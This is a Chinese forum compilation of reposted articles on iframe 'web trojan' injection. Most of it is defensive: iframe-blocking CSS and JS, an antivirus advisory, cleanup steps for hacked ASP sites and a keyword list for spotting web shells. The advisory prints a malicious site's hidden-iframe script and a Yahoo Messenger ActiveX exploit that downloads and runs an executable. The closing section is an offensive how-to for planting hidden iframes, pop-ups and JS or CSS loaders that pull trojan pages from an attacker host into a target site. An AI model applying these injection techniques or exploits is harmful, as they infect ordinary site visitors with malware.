[转帖]IFrame 网页被挂马 给你最好的办法

燕子

IFrame 网页被挂马 给你最好的办法！

2007-12-31 15:54:10

最近很多的网站纷纷被IFRAME了，有的挂上了木马，有的疯狂地弹窗，有的给人家增加流量。一个个文件去查找替换那些IFRAME代码，刚松口气，不久又加上去了。

　　智亘信息本着为客户着想的精神，经过技术人员的努力，找到一种让此类木马无法运行的方法，再此提供给大家：
　　在<style></style>标记中加入：iframe{v:expression(this.src="/about:blank",this.outerHTML='');/*使用IE Only 的样式会除所有　IFRAME　*/}
　　如果要使自己的IFRAME显示在网页里，别人挂的IFRAME马都不起作用，在CSS里加一个 #f126{v:expression() !important}就OK了，对应的IFRAME代码为：<iframe id="f126" name="f126" src="http://www.netrice.cn">

再加固防线，加入以下JS代码——其实这个代码可以完全不用：

<script type="text/javascript" language="javascript">
//<![CDATA[
function killfrm()
{
var xgzfrm=document.getElementsByTagName("iframe");
for(var i=0;i<xgzfrm.length;i++)//循环检查所有IFRAME标记，把所有IFRAME的URL都改为空白页，然后删除IFRMAE标记；
{
xgzfrm.src='about:blank';
xgzfrm.outerHTML='';
}
}
window.onload=killfrm;//一边加载页面，一边执行这个JS方法；
//]]>
</script>

燕子

相信大多数站长都曾经遭遇过iframe木马的侵害，有朋友的网站被注入了N回iframe，心情可想而知。而且现在ARP攻击，注入iframe也是轻而易举的事，仅局域网里都时刻面临威胁。

今天把原理细细地讲一下吧：

IE Only——一般只有IE害怕iframe这样的挂马,所以就拿IE开刀。

在阅读本文之前，我们先了解一下expression；

IE5及其以后版本支持在CSS中使用expression，用来把CSS属性和JavaScript脚本关联起来，这里的CSS属性可以是元素固有的属性，也可以是 自定义属性。就是说CSS属性后面可以是一段JavaScript表达式，CSS属性的值等于Javascript表达式执行的结果。在表达式中可以直接引用元素自身的属性和方法，也可以使用其他浏览器对象。这个表达式就好像是在这个元素的一个成员函数中一样。

很多朋友都知道CSS可以直接描述一个可视标记的外观。例如：p{color:red} 则网页里 所有p标记里的文字颜色都会变成红色;iframe不也是一个标记吗？开始跟灵儿写代码吧，呵呵：
iframe{...这里写描述外观的CSS代码;};

仔细想想要防止iframe里的东东被下载的最好办法是什么？核心来了，那就是切断iframe里的请求，切断请求就是要迅速销毁iframe对象。如何实现呢，上面不是介绍了expression吗？expression是可以执行JS脚本的哈。语法格式如下二种：

标记固有的CSS属性名:expression(JS表达式);
或 自定义属性名:expression(JS表达式);

在这里我们选择第二种，代码应该大致是这样
iframe{v:expression(JS表达式);}

接下来的问题是如何销毁网页里所有的iframe对象；使用JS实现的原理是这样的:使iframe里的请求地址变成空白页(about:blank)，再将iframe对象从DOM（文档对象模型）中移除就可以切断所有iframe里的请求了。移除DOM节点的方法比较多，我这里就用 outerHTML这个属性吧。CSS代码如下：
iframe{v:expression(this.src='about:blank',this.outerHTML='');}

说明：前面的v字是我自己定义的一个CSS属性，这里的this代表所有将要描述外观的iframe对象，中间的逗号代表二句代码一起执行，没有执行优先顺序，这可是强有力的保证噢。about:blank代表空白页，大家都知道的。outerHTML属性是DOM对象包含自身的HTML代码，而innerHTML则是DOM对象（不含本身）里面所包含的HTML代码。

爽快，代码写好了，就让我信来测试一下有没有效果。

首先，新建一个网页，插入以上的CSS代码(或在您现有的CSS代码里加入上面那句)：
<style. type="text/css">
iframe{v:expression(this.src='about:blank',this.outerHTML='');}
</style>

然后在这个页面插入几个IFRAME代码，假设它们是被挂的木马网页。代码如下：
<iframe. src=""></iframe> admin5
<iframe. src="http://www.caoxoo.com/"></iframe>草讯
<iframe. src=" http://www.ssguo.com/"></iframe> 涩果

保存为noiframe.htm，打开浏览器测试一下（本地测试需要启用顶部禁用的脚本的提示条哦）。我这里使用抓包工具来测试，不过也没有必要使用抓包工具，一个最简单有效的方法是打开IE的缓存文件夹，先清空它，再刷新这个页面，看看缓存文件夹里有没有这三个网站里的文件。如果没有，说明没有任何请求结果被返回——测试结果是令人满意的。

提示：Windows XP SP2的缓存文件夹位置　C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files

细心的朋友发现问题来了，如果我自己的网页里要使用iframe这个东东怎么办？

答：如果要使自己的iframe显示在网页里，而别人挂的IFRAME马都不起作用，在CSS里加一个
#caoxoo{v:expression() !important}

对应的IFRAME代码为：
<iframe. id="caoxoo" name="caoxoo" src="http://www.caoxoo.com/"></iframe>就OK了。

提示：IE7中优先执行标注有"!important"描述的样式，IE6不认识!important，采用就近原则，所以IE6的这个代码放在CSS的最后就可以了。

这里的f126，有很多朋友有疑问，他们问我为什么取"f126"，我这样回答——这个f126是随意取的，只要下面的iframe里的ID属性和CSS里的一致就行了。同事又要递一块饼我吃，我说饱了哈..嘻嘻..

当然挂马者可以构造这样的代码
<iframe. style="v:expression() !important" src="URL"></iframe>
使我的防御方式失效，不过它得特意去看我的CSS代码里iframe里的前缀v,如果我的v是变化的呢，哈哈，是不是也不管用呢！

小结：以上的方法只是停止了iframe的请求并销毁了它本身，但以后的挂马方式改变了，例如改成

<script></script>

燕子

      近日，根据恶意网址跟踪检测结果分析，发现网站挂马已经成为了木马传播的最主要的渠道，病毒作者通过入侵各种网站、论坛、博客，在其页面上种植网页木马，当用户浏览这些带有网页木马的网站时，如果系统没有打过相应的补丁，就会感染木马病毒，包括各种网游木马，QQ木马，以及网银盗号木马，严重威胁用户的数字财产的安全。
与以往不同的是，近期病毒作者除了利用以前常用的系统漏洞如：MS06-14漏洞、MS07-017漏洞、MS07-004漏洞进行传播木马之外，还盯上了常用的应用软件漏洞，比如各种IM及时聊天工具漏洞、播放器漏洞、网络电视播放软件漏洞，甚至就连搜索工具条的漏洞也成为病毒作者热衷使用的传播手段。
       在此，网络巡警提醒广大用户：
一定要给系统打好补丁，可以使用Windows Update功能给系统即使更新到最新的补丁，尤其是MS060-14漏洞、MS07-017漏洞、MS07-004漏洞等网页木马常用漏洞一定要给系统打上。
       也可以用KV2007、KV2008内置的“系统漏洞检查”功能来给自己的操作系统做个体检，该功能可以打上系统所缺少的补丁，减少网页木马入侵的可能。
       网站挂马现象还会持续发生，建议广大用户不要登陆来历不明的网站，不要点击不陌生的网址连接，避免感染网页木马病毒。
MSN性感相册”蠕虫病毒可能还会出现新的变种，因此建议广大用户不要随意接收从msn对方好友发来的文件，避免感染msn病毒。
QQ尾巴病毒”可能会有新的欺骗手法，提醒广大用户不要轻易相信对方发送来的文件、中奖邀请、电话点歌、朋友汇款、邀请等欺骗手段，避免带来损失。
      病毒作者还有可能利用其它的应用软件漏洞进行传播木马病毒，在此建议广大用户使用最新版本的应用软件，包括各种IM及时聊天工具、下载工具、播放器软件、搜索工具条等，避免木马病毒从这些软件漏洞传播进电脑。
       附文《利用Yahoo! Messenger 8.1.0 ActiveX控件GetFile方式任意文件上传漏洞挂马的病毒已经出现》，供参考：
根据检测，近期有一个恶意网址利用最新的Yahoo! Messenger 8.1.0 ActiveX控件的一个漏洞进行传播木马，详细分析如下：
        恶意网址http://cool.47555.com/m.js 
        页面采用iframe框架挂马法，包含的如下恶意代码，
document.writeln("<iframe style=\'display:none;\' src=http://58.215.76.197/614.htm><\/iframe>");
document.writeln("<iframe style=\'display:none;\' src=http://cool.47555.com/vvv/06014.htm><\/iframe>");
document.writeln("<iframe style=\'display:none;\' src=http://cool.47555.com/vvv/ya.htm><\/iframe>");
document.writeln("<iframe style=\'display:none;\' src=http://cool.47555.com/vvv/1.htm><\/iframe>");
document.writeln("<iframe style=\'display:none;\' src=http://cool.47555.com/vvv/xx.htm><\/iframe>");
       1. 其中http://58.215.76.197/614.htm页面和http://cool.47555.com/vvv/06014.htm页面采用US-ASCII算法加密，解密后发现这是一个采用VBScript语言编写的页面，该页面利用MS06-014漏洞下载木马病毒：http://cool.47555.com/vvv/444.exe，这是一个木马代理病毒，KV报病毒名称TrojanDownloader.Agent.pps
       2.http://cool.47555.com/vvv/ya.htm页面利用Yahoo! Messenger 8.1.0 ActiveX控件GetFile方式任意文件上传漏洞挂马，该恶意网址的exploits代码如下：
<pre>
    <object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
    test.GetFile "http://cool.47555.com/vvv/uu.exe","c:\\uu.exe",5,1,"tiany"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"uu.exe"
</script>
</pre>
       雅虎通的CYFT ActiveX控件实现上存在漏洞，远程攻击者可能利用此漏洞向用户系统上传任意文件。CYFT ActiveX控件的GetFile()方式没有对用户提交的参数做充分的检查过滤，远程攻击者可以通过提供畸形参数向用户系统的任意位置上传任意文件，然后运行。
        该漏洞在milw0rm上的Shellcode代码：  http://www.milw0rm.com/exploits/4428
        该漏洞的解决方案：
        1. 最新版本的Yahoo! Messenger ，官方下载地址：http://cn.messenger.yahoo.com/
        2. 注册表中设置killbit ：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\ActiveX Compatibility\{24F3EAD6-8B87-4C1A-97DA-71C126BDA08F}]
"Compatibility Flags"=dword:00000400
        3.http://cool.47555.com/vvv/1.htm页面采用java - script 语言编写，并经过八进制转换加密，解秘之后，发现其利用MS06-014漏洞下载病毒文件http://cool.47555.com/vvv/444.exe，并且执行，这是一个木马代理病毒，KV报病毒名称TrojanDownloader.Agent.pps
        4.http://cool.47555.com/vvv/xx.htm页面采用java - script 语言编写，该页面利用MS06-014漏洞下载病毒文件http://cool.47555.com/vvv/444.exe，并且执行，这是一个木马代理病毒，KV报病毒名称TrojanDownloader.Agent.pps
       根据近期恶意网页测结果来看，病毒作者除了利用常用系统漏洞MS060-14漏洞、MS07-017漏洞、MS07-004漏洞进行挂马之外，更多的热衷于使用应用软件的漏洞传播木马，由于这些应用软件的用户量极大，因此传播木马的效果也很好，近期较多用的应用软件漏洞如下：
        WEB迅雷漏洞
        百度搜霸ActiveX控件远程代码执行漏洞
        PStream 堆栈溢出漏洞
        暴风影音2 mps.dll组件多个缓冲区溢出漏洞
         jetAudio 7.x ActiveX漏洞
         迅雷5漏洞
         Yahoo! Messenger 8.1.0 ActiveX控件GetFile方式任意文件上传漏洞
请大家立即将以上软件升级到最新版本。

燕子

网上，杂志上发表的网站挂马攻击和盗窃的方法非常的多，可以用信手拈来来形容，但是防御的方法却很少，那么到底该怎么防御呢？网管怎么处理自己那已被别人挂过的站呢？访客怎么防止被别人给挂马攻击呢?？面让我来详细的给大家介绍一下。

如何防止被挂马攻击 
                                                                                               

   首先，在一台计算机上，杀毒软件是必不可少的，曾经我进过一台服务器，里面的安全做得非常的好，杀毒软件也比较BT，而且是多种共存的，相信,那个网管也是个比较厉害的hacker了，这样，即使别人挂了马在他的服务器上，也会被别人杀掉，当然，这种只能防住特本机被别人放了木马，但是如果是“黑客”是通过将木马传到自己的空间，仅仅是在服务器上做了个连接的，怎么办？网站的访客们又该怎么办？尽管他是有危险的，但是防治的方法也不是没有，下面先说说访客该怎么防御：


一，访客防御篇


最基本当然就是下载一个杀毒软件在自己的机器上，随时监控你的计算机，因为对于菜鸟来说，这样做已经是不错的选择了。还有自己随时都要小心每个人给你发来的网页，或者自己觉得有点不可信的站点，（小提示：连网易都有被黑的时候，难道还有什么站有不会被黑的可能吗？安全应该放在第一位），然后下载一个能够直接查看网页源代码的软件，或者在地址栏里直接输入“view-source”，然后再在后面接着输入网址。

然后在记事本里面查找一些连接，当然，如果想自己的机器比较安全的话，目前只有这么笨拙的方法了，针对一般的冰狐浪子的网页木马查找方法很简单，只要在这个源代码的记事本里面按下F3然后在要查找的字符里面输入icyfox就可以了，这样的话就可以排除这种可能了，或者输入”src”来查看等到后面的连接，这样查找相对于一行一行的查找更省时一些，如果自己觉得连接可疑，可以继续用查看源代码的方法去查看觉得可疑的连接，当然，根据挂马的人的习惯，他们一般愿意用<iframe> </iframe>的方法，所以这样的话，又缩短的查询的时间，如果觉得这些都不太省事，而自己平时又很少登陆到java脚本，那么，你可以禁止java脚本和activex 在你的机器上运行，这样的，你的机器就相对的安全了很多，而网页木马一般就是靠这些通过网页进入到你的计算机里的，所以，这么做会比较省事。

访客的访治方法介绍完了；下面继续讲讲服务器的网管该怎么去防治自己的服务器或自己的站点被别人给挂上木马：


二，网管防治篇


第一项和访客的是基本一样，就是在自己的服务器上安装杀毒软件并进行时时监控，最好能够同时安装多个杀毒软件，尽管杀毒软件彼此不兼容，但是在网上能够搜索到很多修改的方法来让他们兼容，毕竟程序没有完美的，病毒库的不同，所杀的病毒或木马的种类也应该有点不同，所以这样可以彼此补充不足，这样的话，服务器就进一步的安全了，还有就是要把自己的服务器做好，要尽量防止被别人注入，或者被暴库。因为现在流行的攻击就是这么多了，只要自己的站点安全，别人想借用你的站点去攻击别人，那就会很有难度了。如果服务器里面已经被挂了木马也没有关系，可以通过批量查看来做一下检测，或者先通过访客的反馈或者自己当回访客查一查那个页面里被挂了木马，然后通过网页批量修改器对被挂了马的页面进行修改。
其实服务器的维护比服务器攻击更难，只要服务器的管理员尽心的去管理服务器的话，那被挂马的可能性会大大的减小，而真的被挂码够，批量修改器又是一种比较快速，高效的帮手了，关于防治挂马的防止就介绍到这里了，因为个人能力有限，如果朋友们还有更好的方法请不吝赐教，欢迎对安全和代码感兴趣的朋友与我共同进步。

燕子

最近，是有不少网站被频繁“挂马”，本人也有同样的经历。我通过分析，用瑞星系统漏洞扫描专门工具软件仔细检查过，发现WEB服务器并无任何漏洞。那黑客是怎样入侵的呢？后来怀疑是用户注册模块代码有BUG，于是禁用了用户注册功能，并把所有注册用户数据删除（我也是不得已而为之，为了保证网站安全只有用此下策，总比三天两头被挂马好^_^），这样一弄，真的再也没被挂马了！！还有一点很重要：就是用专门的系统漏洞扫描工具检查WEB服务器是否存在漏洞，打上所有漏洞补丁。有的人又要说了，系统有自动升级补丁的功能呀，何必要扫描？其实WINDOWS的UPDATE只下载一些危险级别高或中等的漏洞补丁，对于低危险等级的它会置之不理的，所以要系统漏洞扫描专门工具软件来帮忙。瑞星的漏洞扫描工具就可以一次性扫描系统所有漏洞（忽略危险等级），并自动从官方网站下载、安装。
顺便推荐三个站长必备工具：
1、瑞星系统漏洞扫描专门工具-----高手从正版瑞星杀毒软件中提取出来的好工具>>>站长必备的查漏利器！下载地址：http://www.freexz.net/lspj/10/2/2006-11-27/200611272349.html
2、雷客图ASP木马工具：一个扫描ASP木马的脚本，本地命令行下使用，速度比ASP的快：），可以检查网站是否被挂马。

#用法: Cs cript scan.vbs [扫描路径] [结果HTM文件路径]
#例子: Cs cript scan.vbs d:\Web f:\my\report.html
下载地址：http://www.freexz.net/lspj/10/2/2006-12-25/200612252950.html
3、淘特ASP木马扫描器：本程序可以扫描服务器上的所有指定类型(asp,cer,asa,cdx)的文件，查出可疑的木马程序。系统采用扫描程序与病毒库分离的形式，以后升级只需像杀毒软件那样升级病毒库就可以了。目前可以查杀所有流行的ASP木马程序。使用方法：
将本程序解压后的文件上传至服务器中。执行:http://你的网址/scan.asp
 登录密码：totscan  下载地址： http://www.freexz.net/lspj/10/2/2006-12-25/200612252951.html  

 本站有七款破解版的防盗链软件，金马防盗链系统2.20下载地址http://freexz.net/lspj/10/5/2006-11-30/200611302382.html、呆呆防盗链1.0、IIS 入侵检测&防盗链&流量控制系统2005等7款。

燕子

 如果你发现你网站已经中招（大部分表现为被人插入iframe代码，首页或者每个页面），可以参照以下办法进行处理：
（相关论坛链接：/dispbbs.asp?boardID=67&ID=304237&page=1）

1、按固顶dispbbs.asp?boardID=67&ID=308282&page=1打上最新安全补丁！！！。

2、对比所有的asp文件，发现多出来的asp文件，立即下载备份（供分析用）然后从站点中删除！如果是文件大小、日期不一致的，编辑该文件，看是否有不良代码。黑客比较喜欢在conn.asp和config.asp里面放不良代码。如果发现有，先删除，然后上传官方最新文件替换。

3、查看所有的JPG,GIF文件名，凡是发现带asp文件名的，立即下载备份（供分析用）然后从站点中删除！

4、以上2、3步骤是检查木马程序文件，完成后，就该检查后台模板了。首先当然是立刻修改管理员密码（能动你模板说明就能进你后台了），然后在模板管理中，用查找替换模板的方法，查询你网站页面被插入的那个iframe代码。

5、停止网站所有的上传功能，检查所有会员名，发现带asp的(包括*.asa、*.cdx、*.cer)，全部删除（请自行斟酌，为了网站安全，损失点也没办法），同时，在网站选择题那设定禁止注册：asp 这样的会员。

6、如果你网站的数据库使用的是默认的数据库路径和文件名，请立即更改！切记！

7、登陆后台后网页一片空白的处理方法，用对应版本原始的admin文件夹覆盖你的管理目录中的文件，并将目录中多出来的文件删除掉。

8、登陆时提示验证码不正确的，一般表现为验证码多了下划线。请用原始的动易文件覆盖你网站根目录上的images文件夹下面的几个后缀为fix文件，以及/inc/checkcode.asp文件。

9、最好重新生成所有的HTML文件以及所有的JS文件。

10、以上方法都试了还不行，那就备份数据库，然后删除全站，再重新上传。

以下是：rhongsheng 提供的一个方案：
-------------------
1.修改/inc/checklist.asp文件中的94行，在其中加入Or InStr(iname, ".") > 0 。该代码起到注册是限制注册用户名包含有“.”。或者在其中限制包含"asp"也可以Or InStr(iname, "asp") > 0。可以两者一起限制。经过本人测试，限制之后eval后门执行程序起不了做用。
------------------
以上办法供参考，有更多措施将进一步补充完善。
------------------------------------------------------------------

  另外，需要补充一下的是：
1.系统内自带的“禁止注册的用户名”中即使加了.asp|asp|限制都依然可以注册，所以为防止出现意外，建议暂时关闭会员注册，或根据以上的临时修改方案暂时解决。

2.如果你网站的数据库使用的是默认的数据库路径和文件名，请立即更改！切记！

燕子

　　要查木马不需要很多工具，一个Ftp软件加上Windows自带的搜索功能，再有个文本编辑器如Windows带的记事本就齐备了。
　　Ftp软件建议用FlashFXP，在查木马方面他有些功能比较实用。

第一步：

　　检查网站是不是最新的组件（在登录系统后台，页面最下方显示“动易组件支持”的版本号，尽可能使用最新的组件）。

第二步：

　　请检查网站根目录中是否还保留有 Install.asp 文件，若有请立即删除。当您的网站架设好后，Install.asp 文件一定要删除！！ 

       检查“系统设置”->“网站信息配置”中的“版权信息”是否有“< script  ”、“ <iframe ”等脚本内联代码 ，若有请立即删除。

第三步：
       
　　点击“系统设置”->“在线比较网站文件”链接，利用系统提供的在线比较工具，查看动易的文件有无异常，若有利用FTP进行相应文件的检查，以确保动易的文件都是最新的。

燕子

第四步：

        登录Ftp仔细查找动易以外的木马文件。您可以在“FlashFXP”软件中选择“工具”->“查找在FTP服务器上的文件”功能查找文件：

　　由于木马一般都为.asp 文件，所以这里FTP 文件搜索名称我们可以输入 *.asp ,查找范围全网站：

　　由于黑客上传的木马往往是最近日期的，因为本身的系统作为用户并不频繁修改系统文件，点击“修改日期”按修改日期进行排列检查：

　　点击最新日期的文件右键，选择“查看”：

　　windows 会弹出记事本预览代码，您就可以看到本文件是否为木马文件，如果是则可利用FTP 直接删除。
        
　　如果以上您不知道的文件过多，一个个排查十分浪费时间话，您可以下载整个网站程序到本机进行排查。

注意：您可以不用下载网站中的Database 目录，Database 目录中网站的数据库文件PowerEasy2006.mdb（或您已经改名）。如果检查过了各个频道文件夹内的 UploadFiles上传目录，则这些目录也可不用下载。
　　究竟有多少频道目录及他们的上传目录是什么 可在系统后台，系统设置，网站频道管理中，看到频道目录名：



　　各频道的上传目录名在每个频道管理的上传选项中查看：

　　下载到本机后，可以利用windows 搜索管理功能，查询一些具有攻击性的语法，如动易系统没有 VBScript.Encode ，所以一经发现即可立即删除本文件。

　　这里提供搜索的关键词不一定是最全的，希望有经验的朋友继续提供，我们会随时更新关键词列表。

关键词	可能性	解决方法	动易包含此关键词的文件
VBScript.Encode	100%	删除	无
海洋	100%	删除	无
稻香	100%	删除	无
冰点	100%	删除	无
0D43FE01-F093-11CF-8940-00A0C9054228	100%	删除	无
093FF999-1EA0-4079-9525-9614C3504B74	100%	删除	无
72C24DD5-D70A-438B-8A42-98424B88AFB8	100%	删除	无
CreateTextFile	100%	删除	Install.asp ,Admin_RootClass_Menu.asp, User_saveflash.asp
eval(r	100%	删除	无
Execute request	100%	删除或替换	无一般是在正常文件中加入如 execute request("x") 来执行非正常代码建议替换
Execute session	100%	删除或替换	无，同上
OpenTextFile	100%	删除	Admin_CreateOther.asp ,User_saveflash.asp
WriteLine	100%	删除	无
WSCRIPT	100%	删除	无
5xSoft	100%	删除	无
Scripting.Dictionary	100%	删除	无
Request.BinaryRead	100%	删除	无
DeleteFile	90%	删除或替换	Install.asp ,User_saveflash.asp
MoveFile	90%	删除或替换	reg.asp
Getfile	90%	删除或替换	top.asp ,admin_CreateOther.asp ,Index.asp

注意：动易系统包含的不要删除，例如：User_saveflash.asp（用于系统摄像头图片捕捉上传），不是动易的建议立即删除。

燕子

第五步：

　　检查服务器IIS 映射。
　　如果您有自己的服务器，您要查看下 IIS 网站属性   － 主目录 － 配置选项按钮 － 映射，将扩展名为cdx 和 cer 都删掉。 

　　至此查木马的工作可以告一段落了。再总结归纳一下三个方法和一个注意：

方法：
       
　　1、对比法：请经常关注系统后台提供的在线比较工具，查看动易的文件有无异常，需要的时候使用Ftp工具的比较功能进行比对。
　　2、时间比较法：记住自己最后更新文件的时间，出现在该时间以后的可执行脚本一定有问题。但是注意，数据库的更新时间总是最新的，请不要误删。
　　3、关键词搜索法：按照我提供的关键词搜索文件，基本可以确定木马。

注意：

　　配置好网站后要记得删除网站根目录的 Install.asp 文件。

　　最后，“防”更胜于“杀”，请及时动易官方最新的组件，尽量不安或少安插件，才是保证你的网站正常运行的不二法则。
　　有一点应该注意，如果确实发现木马了，处理完毕之后，应该将具有管理权限的各类帐号都进行修改。包括论坛的帐号、数据库帐号以及服务器操作系统帐号、FTP 帐号等。

燕子

关于[挂马代码]：

可能大家一看到是htm的就想到用下面代码：
<html>
<iframe src="http://127.0.0.1/m.htm" width="0" height="0" frameborder="0"></iframe>
</html>
但这个很不安全
<SCRIPT language=javascript>         
window.open("http://www.xx.com/test.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");   
</script>
学过java的都知道上面一段代码的意思了把！打开网站的同时也就打开了我们的http://www.xx.com/test.htm
还有一点就是比较隐蔽的那就是使用js文件
document.write("<iframe width='0' height='0' src='http://xxxxxxx.net/mm1.htm'></iframe>");
document.write("<iframe width='0' height='0' src='http://xxxxxxx.net/mm2.htm'></iframe>");
保存为mm.js，然后在首页里调用js脚本
<script language="javascript" src="http://xxxxxxx.net/mm.js"></script>
此招相当隐蔽.......实战就不用说了，
再一种代码就是调用其他网页的页面文件,可以将下面的代码复制，保存为HTM文件。
<frameset rows="444,0" cols="*">
<frame src="/index.htm" framborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0">
<frame src="help.htm"  frameborder="no" scrolling="no"   noresize marginwidth="0" margingheight="0">
</frameset>
    打开这个网页文件时显示的是index.htm的内容，而实际上执行了help.htm的代码，大家可以对应
自己生成的木马页和想调用的网页来修改help.htm和index.htm，把它们改成你的文件名就可以了。

rm网马制作传播
使用记事本写下面这样的话：
u 00:5.0 01:10.0 http://127.0.0.1/000.htm
u 01:10.0 01:10.0 http://127.0.0.1/000.htm
意思是在5秒和1：10秒自动连接后面的地址http://127.0.0.1/000.htm

把下面的代码
<SCRIPT language=javascript>
window.open("http://www.cnnst.com/muma.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
插入到http://www.target.com/index.asp中，那么当有人浏览这个页面时，会弹出http://www.cnnst.com/muma.htm这个窗口，同时他也就中了我们的木马。注：width=1,height=1时，弹出的页面比较小，而width=0,height=0时就比较大了。
js挂马，有两种具体实现
1.
把代码
<script src="http://www.cnnst.com/fisco.js"></script>
挂到目标网页http://www.target.com/index.asp的代码里面，其中fisco.js的内容为
document.write("<iframe src='http://www.cnnst.com/muma.htm' width=0 height=0 frameborder=0></iframe>")
注：fisco.js和muma.htm在我们FTP空间的同一个目录下面（此例都为根目录下）
2.
如果目标网页http://www.target.com/index.asp代码中调用的有*.js文件(比如调用了gudu.js),那我们就把代码
document.write("<iframe src='http://www.cnnst.com/muma.htm' width=0 height=0 frameborder=0></iframe>")
挂到gudu.js代码里面，这时，当别人浏览目标页面时同样会中马
拓展：例如，如果index.asp调用gudu.js,那我们就可以把fisco.js插入到gudu.js里面。
css挂马.把下面代码
<link href="http://www.cnnst.com/fisco.css" rel="stylesheet" type="text/css" />
插到目标网页index.asp代码中。其中fisco.css的内容为：
body
 { background-image:url(javascript:document.write ("<script src="http://www.cnnst.com/fisco.js"></script>"))
 }
其中fisco.js的内容为
<script src="http://www.cnnst.com/muma.htm"></script>
注：fisco.css  fisco.js  muma.htm在你的FTP空间的同一个目录里
拓展；可结合方法三，综合运用可衍生出很多具体实现
运用<!--#include file="*.asp"-->
如果目标文件index.asp中包含<!--#include file="fisco.asp"-->语句,那么我们可以在fisco.asp中采用上述四种方法